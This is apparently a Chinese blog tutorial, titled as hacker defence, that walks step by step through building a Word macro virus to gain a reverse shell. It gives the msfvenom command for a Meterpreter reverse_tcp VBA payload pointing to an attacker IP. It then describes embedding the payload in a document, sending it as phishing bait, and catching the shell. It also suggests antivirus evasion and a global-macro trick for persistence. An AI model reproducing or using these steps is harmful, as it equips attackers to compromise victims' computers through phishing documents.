#黑客##网络安全威胁##科技#

实验名称:

利用Office宏病毒反弹shell

黑客防御病毒(黑客是如何通过宏病毒入侵你电脑的)(1)

病毒简介:

宏病毒是一种寄存在文档或模板的宏中的计算机病毒。一旦打开这样的文档,其中的宏就会被执行,于是宏病毒就会被激活,转移到计算机上,并驻留在Normal模板上。从此以后,所有自动保存的文档都会“感染”上这种宏病毒,而且如果其他用户打开了感染病毒的文档,宏病毒又会转移到他的计算机上,攻击者甚至可以利用在宏代码中写入反弹shell脚本,诱骗受害者打开带有宏病毒的office文档,实现对其主机的远程控制。

实现过程:

1.首先实验攻击者利用本地(172.16.0.55)的Metasploit工具生成payload文件,生成名为jaky.vba的文件.

命令如下:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.0.55 LPORT=6666 -f vba -o JAky.vba

黑客防御病毒(黑客是如何通过宏病毒入侵你电脑的)(2)

2.我们可以先cat一下这个文件,看看这跟文件里面payload的内容。

黑客防御病毒(黑客是如何通过宏病毒入侵你电脑的)(3)

黑客防御病毒(黑客是如何通过宏病毒入侵你电脑的)(4)

3.也可以将这个文件放到网站根目录下面,通过网站的方式打开这个文件, 查看生成的payload

黑客防御病毒(黑客是如何通过宏病毒入侵你电脑的)(5)

4.将vba代码录入宏中,我们可以先新建一个word文档。

黑客防御病毒(黑客是如何通过宏病毒入侵你电脑的)(6)

5.打开word文档,默认情况下,宏是关闭的,进入信任中心,点击信任中心设置,手动开启一下。

黑客防御病毒(黑客是如何通过宏病毒入侵你电脑的)(7)

黑客防御病毒(黑客是如何通过宏病毒入侵你电脑的)(8)

6.开始设置宏内容:宏的名字可以任意命名,点击“创建”出现宏的编辑器。

黑客防御病毒(黑客是如何通过宏病毒入侵你电脑的)(9)

7.将之前生成的宏病毒payload,复制到新创建的宏里面。

黑客防御病毒(黑客是如何通过宏病毒入侵你电脑的)(10)

8.将文档保存另存为包含宏的文档类型,这里其实也可以直接保存的。

黑客防御病毒(黑客是如何通过宏病毒入侵你电脑的)(11)

9.保存后退出,并通过各种方式向受害者发送此钓鱼文档,并引诱其打开。

黑客防御病毒(黑客是如何通过宏病毒入侵你电脑的)(12)

10.在kali上面设置监听模式等待对方点击文档,然后反弹shell

黑客防御病毒(黑客是如何通过宏病毒入侵你电脑的)(13)

11.执行监听,然后诱骗点击文档,就可以看到反弹过来的shell了,拿到用户权限。当文档关闭的时候,该工作组会被关闭,所以建议做进程迁移。

黑客防御病毒(黑客是如何通过宏病毒入侵你电脑的)(14)

12.更加恶劣的是,当这个宏病毒一旦注入到目标主机时,后面不管用户新建或者打开什么word文档,都会被反弹连接上来。

黑客防御病毒(黑客是如何通过宏病毒入侵你电脑的)(15)

实验拓展:

1.实验过程中,这种简单的shellcode,可能会被杀毒软件报毒。对shellcode部分可以尝试做一下免杀处理。

2.如果创建的是全局宏,Office会在这个目录生成一个dotm文档:

C:Users(username)AppDataRoamingMicrosoftTemplates

黑客防御病毒(黑客是如何通过宏病毒入侵你电脑的)(16)

注:全局宏是对于当前计算机所有文档对象有效,即文档本身不包含宏代码,也可以运行全局宏。但是本身的全局宏名字是随机生成的,所以要先创建一个全局宏,定义一下名字。打开其他文档时才能调用并执行代码。

这个全局宏中的文件:vbaProject.bin是包含了特征的文件,但是反病毒软件不会扫描这个文件,除非主动查杀。这个特性可以达到维持权限的作用。

,